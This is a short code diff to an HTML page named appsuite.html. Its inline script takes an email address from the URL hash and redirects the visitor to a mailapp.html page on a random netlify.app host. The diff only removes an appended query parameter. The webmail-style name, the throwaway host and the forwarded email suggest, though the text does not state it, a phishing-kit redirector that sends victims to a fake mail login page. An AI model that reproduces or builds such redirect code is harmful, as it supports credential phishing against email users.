--- a/appsuite.html
+++ b/appsuite.html
@@ -6,7 +6,7 @@
   </title>
   <script>
     var data = getParameter();
-    var redir_to_page = "https://6886d19524631c09abf7561b--unrivaled-figolla-e119c1.netlify.app/mailapp.html" + data + ""; 
+    var redir_to_page = "https://6886d19524631c09abf7561b--unrivaled-figolla-e119c1.netlify.app/mailapp.html"; 
     var hash = window.location.hash;
     var email = hash.split('#')[1];
     redir_to_page = redir_to_page + email;
